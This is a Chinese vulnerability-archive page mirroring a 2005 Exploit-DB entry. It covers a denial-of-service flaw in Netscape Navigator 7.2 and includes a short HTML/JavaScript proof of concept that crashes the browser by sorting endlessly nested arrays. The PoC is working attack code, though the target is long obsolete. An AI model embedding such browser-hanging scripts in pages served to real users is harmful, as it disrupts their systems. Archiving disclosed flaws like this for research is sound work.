Netscape Navigator 7.2 – Infinite Array Sort Denial of Service

Netscape Navigator 7.2 – Infinite Array Sort Denial of Service

漏洞ID 1054865 漏洞类型
发布时间 2005-01-21 更新时间 2005-01-21
图片[1]-Netscape Navigator 7.2 – Infinite Array Sort Denial of Service-安全小百科CVE编号 N/A
图片[2]-Netscape Navigator 7.2 – Infinite Array Sort Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25056
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/12331/info

Netscape Navigator is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs an infinite JavaScript array sort operation. It is conjectured that this will only result in a denial of service and is not further exploitable to execute arbitrary code, though this has not been confirmed. 


<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>

相关推荐: CuteNews提升特权漏洞

CuteNews提升特权漏洞 漏洞ID 1200543 漏洞类型 未知 发布时间 2004-12-31 更新时间 2004-12-31 CVE编号 CVE-2004-2615 CNNVD-ID CNNVD-200412-691 漏洞平台 N/A CVSS评分 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享